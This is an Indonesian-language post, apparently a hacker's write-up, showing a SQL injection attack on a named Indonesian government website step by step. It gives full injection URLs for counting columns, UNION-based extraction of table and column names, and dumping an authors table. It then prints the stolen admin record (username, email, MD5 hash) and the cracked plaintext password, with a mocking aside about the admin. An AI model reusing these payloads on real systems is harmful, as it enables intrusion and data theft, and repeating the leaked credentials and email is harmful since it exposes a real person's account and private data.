inject kfm.depsos.go.id

cek error :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10′

1. Memeriksa jumlah Field Tabel

ketemu disini :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+11–

karna di :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+12–

menampakkan error.

2. Mengeluarkan nomor Field

ketemu disini :

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

3. mengeluarkan nama-nama tabel

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11+from+information_schema.tables+where+table_schema=database()–

4. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name=0×617574686f7273

disini saya ambil  authors = 617574686f7273

5. mengeluarkan record-record dari tabel member

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),10,11+from+authors–

done :

By adminkfm:Admin Database:www.depsos.go.id:ujangth@depsos.go.id:cb688d4e30b2488b88e963f933e6f20c:4

cb688d4e30b2488b88e963f933e6f20c = tiarariska

wew kayak’na nama cewek-nya admin’na..hihihihihih

semoga sama admin’na cepetan dibetulin